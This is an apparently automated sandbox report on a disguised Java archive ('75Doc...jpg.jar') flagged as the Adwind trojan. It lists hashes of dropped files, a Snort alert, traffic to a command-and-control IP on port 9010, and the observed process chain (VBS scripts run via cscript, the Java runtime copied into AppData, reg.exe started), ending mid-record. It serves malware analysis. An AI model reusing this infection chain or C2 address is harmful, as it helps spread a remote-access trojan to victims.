C:\jar\OnayiZufuhugu\OgiyizEfahiGu\f4r5q0u0a9k0r9ldq6l8l69hald2b9pc7s4fo64nunn8i0p925p9jhv3tst43t\1l4unsf61c7ata4psnbl8s6jncdgkfm5c0knqv1derabfv8p4ansg1ct97si35o2p832h1d5khb3gsgmmpqika9jdv5qfficb9gl51cbms0kkih7ehchppnmos6f4e48su6il44isn6gcbm1cnjhclergth81ab9o
File Type:	data
MD5:	EA7FE05CAA354B93D22FDDA762593B12
SHA1:	194BAADE6D558B130335F589F8BD8DD3A27E7C5E
SHA-256:	79D483764703079A721677023E0CC81993656968AC55CA709C57545D0BA70961
SHA-512:	9C56BE0A7577DFDDC60B7306AE04711441BF293D3E4C24EE64380BE8F4AC3F8342C2F8D15EBBC435BCC1866B9DD248F7AAC132899F11A706BACDC2B8468C4DB9
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\f4u5jf4cnu1mk1ip0djvigc7p9plld4vsrgfq2hja19bskhs23mhktqsbe5nc73f2r7jklno8dqijp55vpbnt7il2i3klib70g48cqe2pvino46tv2vkuiis2kekvtas1stg5oaue8fshcr1hi3cq5o0plml29uto12v5m4i9m3e39iu99vifsec9juamleu5e2k787votu\9nlrj11rqd31gm9h3v
File Type:	data
MD5:	1FC927553A39E070440DE0FED38D49EF
SHA1:	D9E57E87F2AD74867EC45D1D3B03F268366389CA
SHA-256:	76D04999A13E50157DE9D1FBC7AEB3FFD619C24CF61170BB8DD1622849EA2095
SHA-512:	FA3AED88C3581759957180FEB367C15E504525CDBF1CDAC5837B5FB35763285EE38338C427802A603A8294993B37F49C6B9F4284135B288BC6BC2B878451A5AD
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\f7pq8t8da1omqdcab2d3jai1chm0kf2j
File Type:	DOS executable (COM)
MD5:	2E47D40645492099116E4E9014FF2B93
SHA1:	0AAF67AEBED87D630B931C5403A78304CC900CDE
SHA-256:	84AE7C3079C5832CB296AA12529D9164A817A7BC2D7A55B5D4E28A602CFF5E97
SHA-512:	B3010E294EB5910A577D74D6C317F11EB58EDC735BF24FD2FEE4D5340172D796E0C032D9F6592780C3EA720987E9E4D08831BB4C2BEC21EF89996C034F2E1CF1
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\g19bqmnfigr51634u52fqf3mq7o
File Type:	data
MD5:	7922B881260288977BB16B94456F7B80
SHA1:	1BAFC1ED70A8B520F6B5CA56B9CE4F8C52FB39A2
SHA-256:	6984EE54D518A8DD0DD4B5FF00AA67C08EC8DDA314C7FD0098E310111BD41466
SHA-512:	091FD40282354934C41E2543A4D1853A8FFFAF6C877435E22F6031963D99EAAE4EF5FC2A237ACB2E022042672905CCBDEC493414E377369AD451095C38615624
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\hh2ji2pones834oi\2t7lqerihdscboic15u6ntpfn9flc84p4sqk0e8a90b16k9dkqci4jk6evddde917ddqqh329a9ku8tvs9emfvkhos3c69h\5\2vccv3pf0tc59om166vlltr1unb8ii9ja1u8k87q21fs0b0ct1coelumqahts5isgr8nhrbn1vs0tlaq2366q467c1s7icraop38mfs35rj
File Type:	data
MD5:	296725490636F1F86C48BA1848010302
SHA1:	0464DBB8591F57DADA176088DB54D2D0BD72A1CB
SHA-256:	072DA14C9E549241A1B3510A7EB9383A68443433F720640ED95AEB9BDB0578B3
SHA-512:	C5EB50D20C2D9CBE87B5CF6B8EF087A99DC5A6753C45D210F25BB1055ED38F5184E4498B4164969174713B5C4E512B28543CCB117EA5B456EBDEB082D0634B39
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\hm738topc8f4nq7isob85kgvsb2136\671oa7\7lltfkfnkukveomi52tomvju30j4he610m3j8qehj2hnp9h481ethrmse3jhomhppckgnn1t6pv5qresqgh7vum82bal0qdnfonqjsqfrah68me74k9rg\3v4c442dknvkgvj3l3ilh6pq5nmrs6i76qvk7c2j6ivjdg\8qj5rucmun1mm21e0aj
File Type:	DBase 3 data file (1116956089 records)
MD5:	1C70FB7642C4A5FC1CE7DDF7B9F91368
SHA1:	3AE0358572C6222803000B260293277A3881E5E6
SHA-256:	678B2041DD850FF73A26AD334F4F33489822118FBBFCDE758AA0A859E2E9E4B3
SHA-512:	067382A2E564A861729E182F43F28C103C8C79764FF0B7E2CD00A69E4D37C2529B15F37C96332F5100EE0FD8C8D79EA481D1C876367BC6D2B6819FB224AB9546
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\inoorv24k1h19amrbedp1ojpl2bqk6p19ba2o887usfbhl9ngcs45i70ce2e6b4i8a9ejo20p316fuha2g2nackpi80pidftuc8joqs68r0v2lbpu1d9hjoti58lk40nnkehth3imo3hutafl7a6v4c0p0sr5a8d9bfknov6dpiut7fcbusluc4a4q31lvt8ig996813cv7upkq3erd4gvte4nn0un
File Type:	cannot open `dropped\inoorv24k1h19amrbedp1ojpl2bqk6p19ba2o887usfbhl9ngcs45i70ce2e6b4i8a9ejo20p316fuha2g2nackpi80pidftuc8joqs68r0v2lbpu1d9hjoti58lk40nnkehth3imo3hutafl7a6v4c0p0sr5a8d9bfknov6dpiut7fcbusluc4a4q31lvt8ig996813cv7upkq3erd4gvte4nn0un.1.dr' (No such file or directory)
MD5:	6CCE7F24F0770E8F0D02A7BEF1BB211E
SHA1:	EE851ADA90E3135F25BF872A9B4E3CA78D76C513
SHA-256:	D7A65435C48C1F994E76104CF6A45E0C7D7B6CC2DF03261D535A1D6E3F2E58EC
SHA-512:	3B4DBDBEBA22F378F352A77F31D696AB0AAD58EE131903BDD809997DF5CA001729422A0FA4F3428F9A9FD3B863DF279F20947FE0DAF0A9400B4EEDF491E0CEF0
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\j7r60qkf2le7qk37sppjjg16ta52rs5nqi6
File Type:	data
MD5:	257C0530ECCB1A2082D9D96499EA7408
SHA1:	998D4170280EADEAB6F8F01C158563C470403EFC
SHA-256:	D10B4C08DCF02BC9D38828187AF4EABDAAAE59CB7C9C905233DBEFB3A1FCC40A
SHA-512:	67DBB3E63312AC7C75ACF320E38D65D81B11AB1CFC49313163F1AA2D76306F9001899B58182B46774271233E5DBFF92085C01579B3560B688321736C3FB42D4C
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\k8qlckn7gv2128bou7g8848nsh3ihrrci2pkjjgvmcjhh981t8rg59hnblq4er4qamsmf947gca6ilkosu10bjv61endfpuvi9u3o\2qc643mqm21r8jtfmailed3av51f32r6bkttpoetml6u0qgcj4lf4lg3ojmo5\4rk8b4ra7g\1m2a0nj4hdrmc57fvt4f3iinp6l58des5q29m70l9j0iqmq
File Type:	data
MD5:	69B602B2268B21EE3C3FA0A4B8BAF412
SHA1:	A905D7856580B7F492286FFD2DE0AA5FB2E038B6
SHA-256:	F3DBAE680753E0692F0DF64E8A8D1F95917B36AB7537AECE0FF9AC4FC53954E5
SHA-512:	8FC49322D38506EE1D49E373DC64C8035F7E6E859CA9068BE033A2AE47A851690E1D77BF0FA6D7E8B3C68C1E73BD7DE332CBED18834964B4B72DD7E2B3354968
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\kk7pi6\3s0lgildoioo87um8uc2jrgsfno7b7718t3gi5saru331p32ihd7mumts9ia6h17ep8gctlpl16ts46lolae8ab5uo5dvu5uonvqq7j63afbust77ggvo475mtvv93mso7jesvataevgafo3lf99b76opebq6f30kta3vli0a1pcqf48t8ntkjkabnadhrs4a9uj2gsjviifr56r7a8e89c
File Type:	cannot open `dropped\3s0lgildoioo87um8uc2jrgsfno7b7718t3gi5saru331p32ihd7mumts9ia6h17ep8gctlpl16ts46lolae8ab5uo5dvu5uonvqq7j63afbust77ggvo475mtvv93mso7jesvataevgafo3lf99b76opebq6f30kta3vli0a1pcqf48t8ntkjkabnadhrs4a9uj2gsjviifr56r7a8e89c.1.dr' (No such file or directory)
MD5:	44D084C250D627EA3BB3C458BAB16DE5
SHA1:	1BDDB52238E613905B5C462948788452C9EF9939
SHA-256:	9E8EF07020078E9B26BAD7E26E90F67922C58DF6C8C788135E5CB36848D619F3
SHA-512:	A7B7AC4DB6D211BFD213E04761478DADF26689AC613B408BDDF0878BEF1B1C3E1FA7BDB1EF329C4C91264988CDB0FC7EA28A88C2283DD8F2293072EAA0976CCD
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\lieecnlnt43dr7v35ors3ghvt8uqgh0da7uohb\3n9uuama4jipp7qq6utrob2mh9dofrlglpvcvgprnhi3jd9uoo49sjothtm4d878kc4evenp0u0r6bg8jpu8jdse28i85eq3sglckdfkffcdovdcmghpn752utr29lfit5256fekoaabhpttvmghp4mi24cbvldfdkmd\35b21hdof9dishe6nl
File Type:	data
MD5:	3046C8AA05CF06517FEA5ADC7009BAF8
SHA1:	EEDDCA57D919AD3904548F59ECAA4646C691ACAE
SHA-256:	333A4AC8136D7AAD5F0D7060BC1860EA2F224889E98CD08F04B67630831637FC
SHA-512:	5C72BF16144F57BD6D98FDAD475644B81B46902B7E750A8865C1CFC6A3EC90333718A8D9123783393CE2D35AB68564D3A5DC7C7B65EBAEDEDD55F469279BA9AE
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\n3pft3br5dkpkndif1etn8ko0uve1rphr2540dquflkg38kgg6kkddeg420cn8jqk\97kgup15rpce53tiaklbe2vbc6fcfe5d2cuqd0c7tj2oj15sf60s8inpi194q8nvfi8pnlaus9k3s0dg73m50jiclh4fno10v38njgn3mospu736hnvjus\6uqomgnv9p73dn5dsj9kepk95pvtjt8qegrg6
File Type:	data
MD5:	006E120DEFC6075A1A084A88C2A63E61
SHA1:	3CCD0D460B5A409EF01D6AA32B8D0F5BEFFB414A
SHA-256:	ABCEA00D194241C7E11AD2EB35A5AB917DB07E75BA7B08A14DB0D4325E38CD2C
SHA-512:	374F13B41FD11FF72F571BCFA50EA64F2131DA9554D8512E255D04216C600FFB691606F0E90F17234205639C3A223BFBFAE9BA69B09309E5C204BA3687E7522F
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\ppmfdqd4jdab1p90cm68740vtpcak8sgpd0ak3hico1eerm2admglq6radrlllhjhr5d5m4red2m5k5vgt9pv9vud6898sj36os82q3tu9fbkh4nf59kilfjpp24ip8pr3fbm4q2n5m7ptbunl677j\3b7f8eqqrskpltjah4bcfmg4m87jhmr12v9r4p989n59n7jotjb1kdpmrabuvg7uo0ra2hq
File Type:	data
MD5:	08748EA3F58CB9D80804AD7990AD691A
SHA1:	17F48ED1FB078C0B44D7B42371D2938E7BFDD94F
SHA-256:	7E4FE438FA06595A767128E0A6D74835EECCFB65EB499A3AEC761FDF3141B9A3
SHA-512:	1C62DA1DA9474A609C39A1E3E1A588AB9A8A8F350865D38A21623F5C62BCFF034FDBE88A2B3B8F86EC41D92D73AFEA2147E46D6D635D1ECC8F16B28A2138A042
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\psegfnpmc9ttakqj9t16i436qsc39b
File Type:	data
MD5:	1A94C899762C7FCA386E6EDB71F59D0F
SHA1:	37D443DD89738D8C10435B86139B831038AC430E
SHA-256:	5E7D400976AE36FFC98A27B4B41EBC21FCFA29924D9C2DCE0DECDB60D150FCAB
SHA-512:	35533360637B3F942A65B2307C7195A182CD83C88BFC44DE90790B2356D52EE98555AB0BA971BBFBB568972E83C86D7DFA90753091F892A92E3DD1141FF6A828
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\q3jhn\2aljgp789chjsibacimpa93fah95291j6bvggvnhqhfiqs3us3s12uevghpfjs56kag0j
File Type:	data
MD5:	7349BB7E1220A721510C924E1DA117CD
SHA1:	C01C548135AC6C7575ED4B8A8E3BB16D3C372F80
SHA-256:	5B013CA9FE3F3BA02E75673D97220F9E8D6820193E0AEDA137FA7ABB83A3DD30
SHA-512:	CF2DB912A75E09132E50A9B5ED27CB26B3CA9CA6CE2C8CABB5858A45893DC35559B565E0EE7EFB75AF6EF5314C0338E56CB6D2951F88A513F2B92A9DFE27FA53
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\svmkm9f6q\74r9tdnljej8somu25\48vgpel3hl8q7p5l1tgps8jvvg7aci3ddh
File Type:	data
MD5:	96FD325346436F48479EC3D57DA58D78
SHA1:	20DA4A814B8EFCB672B58D44EC741E67DBB1E173
SHA-256:	12FD7CF0139FC63D41A59C97213BE055C43834FF62169094110C288C42CE442F
SHA-512:	D3ECBACC726E62DC69DF2453C6F9F1B1EBD9B912D0EC3B10A13FD387E79216C1BC9C9EC813D4459780F1E87ECC1971D1ED4DD70371279CFD3D6385751989095E
Malicious:	false

C:\jar\OnayiZufuhugu\OgiyizEfahiGu\u71mvevgedvah2ctnlu8qni96b41leo0at846k37ahrpgdvpnd6cgf56t1tc43kgl1l8d5812tb7\526vea8djfg4tg9esfj15a7q4bdfu9ehsdr6aksslr79a6jt46\9gu8re8disujte35mho75nju6nqp\5bagj9s3cklh3oueglmooq3v1srg14qdl88hev2\2r7a9b2jac26nmgq3e1pbp87b
File Type:	data
MD5:	62FD0D0B82FA4BAAC22FDD2D33548E75
SHA1:	8A69920B44A9E34FE736D28AC7FCC62FB626C57E
SHA-256:	E0625A0948924E5D789E0D92D7A84F663D7521BEC5F14B47858FEBDC63BF6839
SHA-512:	531C7371ABC926A8855F359AF40DC75FFAFB1A413A315ADA357E57F00C1BAF5F982D59E4F2006F2A517CD84E4006D22A8CC308124ACD4A156B16ED3E1AAB5AC7
Malicious:	false

unknown
File Type:	ASCII text, with CRLF line terminators
MD5:	F13F0AA7207CCCFAD5FB71D8C3290B8A
SHA1:	9A1DCF311056C63BEB22BB7D5763D1EE4870BF05
SHA-256:	01251B4D2F4913EA4098332DE9542760AE58CFF18D2EADEE60301D8936C6D1B6
SHA-512:	E07C5285D9C8ADBB192940E4B06357A84C72205A07E374447084F0B5003BC354DC9A8820AD27303EF60E3DDD05174D85B0F4E2AD8889F56C8F6F1B83097934FE
Malicious:	true

Contacted Domains/Contacted IPs

Contacted Domains

No contacted domains info

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

IP	Country	ASN	ASN Name	Malicious
192.168.1.16	unknown	unknown	unknown	false
178.175.138.167	Moldova Republic of	43289	ICSTrabia-NetworkSRL	true
127.0.0.1	unknown	unknown	unknown	false

Static File Info

General
File type:	Zip archive data, at least v2.0 to extract
TrID:	Java Archive (13504/1) 77.13% ZIP compressed archive (4004/1) 22.87%
File name:	75Doc 0.26777400 15041397050000000jpg.jar
File size:	564204
MD5:	4a1f885f0cb4392ae2ad7ae06b05811e
SHA1:	29c8ff235a21d9bfb1d26734df52bdba897929e3
SHA256:	9a56b122765ef5c96b8a1cc29d65d2e906ff0d805246755323462d6ddb3ca6a5
SHA512:	4f0dcf2cad01fed0090cdfaffacef660b37350ffd2af52f11cf701c2a1cafa357ea96797fe1846af7b11ee34e3b4972251b00d51fcfa84b3782271598aca534e
File Content Preview:	PK........b..K................META-INF/MANIFEST.MF....M.1..0...@...uHQA.lZ...AD\..I..1)i.._o...-w.qW..F.A\...Y..l....%...NC...L...(.........0....J...`....j4f.*).Q.}.......z.A+...w..Z.j..Y..6.r.{....s.~w.J.#.b.....li......1.z.q..PK..............PK.......

File Icon

Network Behavior

Download Network PCAP:	Network PCAP

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/31/17-09:42:16.583231	TCP	2020728	ET TROJAN Possible Adwind SSL Cert (assylias.Inc)	9010	49201	178.175.138.167	192.168.1.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 31, 2017 09:42:14.099525928 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:14.099562883 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:14.099674940 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:14.128257036 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:14.128278017 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:16.583230972 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:16.788480043 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:16.788625956 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:16.854394913 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:16.854418993 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:16.871632099 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:16.871651888 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:16.875518084 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:16.875538111 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:18.328401089 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:18.564481974 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:18.564558983 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:18.574814081 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:18.574836969 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.337384939 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.349230051 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:19.349257946 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.349895000 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:19.349915028 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.351635933 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:19.351656914 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.351939917 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:19.351958990 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.352173090 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:19.352189064 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.352394104 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:19.352410078 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:19.352675915 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:19.352694035 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:20.822251081 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:21.020893097 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:21.037323952 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:21.037348986 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:21.784866095 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:21.784894943 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:36.040261984 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:36.040304899 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:41.037417889 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:41.037446022 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:51.772165060 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:51.772196054 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:42:56.060762882 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:42:56.060791969 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:01.053558111 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:01.053594112 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:16.065687895 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:16.065716982 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:21.053252935 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:21.053292036 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:21.772078037 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:21.772119999 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:36.052974939 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:36.053003073 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:41.053673983 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:41.053705931 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:51.771811008 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:51.771841049 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:43:56.052753925 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:43:56.052786112 MESZ	9010	49201	178.175.138.167	192.168.1.16
Aug 31, 2017 09:44:01.053003073 MESZ	49201	9010	192.168.1.16	178.175.138.167
Aug 31, 2017 09:44:01.053029060 MESZ	9010	49201	178.175.138.167	192.168.1.16

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 3256 Parent PID: 2780

General

Start time:	09:41:51
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar'
Imagebase:	0x77730000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: 7za.exe PID: 3264 Parent PID: 3256

General

Start time:	09:41:51
Start date:	31/08/2017
Path:	C:\Windows\System32\7za.exe
Wow64 process (32bit):	false
Commandline:	7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar'
Imagebase:	0x766a0000
File size:	587776 bytes
MD5 hash:	42BADC1D2F03A8B1E4875740D3D49336
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3324 Parent PID: 2780

General

Start time:	09:41:53
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' OnayiZufuhugu.OgiyizEfahiGu.Main >> C:\cmdlinestart.log 2>&1
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: java.exe PID: 3348 Parent PID: 3324

General

Start time:	09:41:53
Start date:	31/08/2017
Path:	C:\Program Files\Java\jre1.8.0_40\bin\java.exe
Wow64 process (32bit):	false
Commandline:	java.exe -jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' OnayiZufuhugu.OgiyizEfahiGu.Main
Imagebase:	0x77a20000
File size:	190888 bytes
MD5 hash:	6F4EB294ACF731771AFE3EF6F7EE812D
Programmed in:	Java

Chronological Activities

Analysis Process: java.exe PID: 3396 Parent PID: 3348

General

Start time:	09:41:55
Start date:	31/08/2017
Path:	C:\Program Files\Java\jre1.8.0_40\bin\java.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.4312212827200392546983382786626386.class
Imagebase:	0x75860000
File size:	190888 bytes
MD5 hash:	6F4EB294ACF731771AFE3EF6F7EE812D
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3468 Parent PID: 3348

General

Start time:	09:41:58
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs
Imagebase:	0x75b30000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 3476 Parent PID: 3468

General

Start time:	09:41:58
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs
Imagebase:	0x76150000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3528 Parent PID: 3348

General

Start time:	09:41:59
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs
Imagebase:	0x77a20000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 3536 Parent PID: 3528

General

Start time:	09:41:59
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs
Imagebase:	0x77a20000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3592 Parent PID: 3396

General

Start time:	09:42:01
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs
Imagebase:	0x75860000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: xcopy.exe PID: 3600 Parent PID: 3348

General

Start time:	09:42:01
Start date:	31/08/2017
Path:	C:\Windows\System32\xcopy.exe
Wow64 process (32bit):	false
Commandline:	xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Imagebase:	0x75b30000
File size:	36864 bytes
MD5 hash:	361D273773994ED11A6F1E51BBB4277E
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 3608 Parent PID: 3592

General

Start time:	09:42:01
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs
Imagebase:	0x778a0000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3648 Parent PID: 3396

General

Start time:	09:42:03
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cscript.exe PID: 3660 Parent PID: 3648

General

Start time:	09:42:03
Start date:	31/08/2017
Path:	C:\Windows\System32\cscript.exe
Wow64 process (32bit):	false
Commandline:	cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs
Imagebase:	0x778a0000
File size:	126976 bytes
MD5 hash:	A3A35EE79C64A640152B3113E6E254E2
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3708 Parent PID: 3396

General

Start time:	09:42:05
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 3792 Parent PID: 3348

General

Start time:	09:42:14
Start date:	31/08/2017
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe
Imagebase:	0x778a0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: reg.exe PID: 3800 Parent PID: 3348

General

Start time:	09:42:15
Start date:	31/08/2017
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
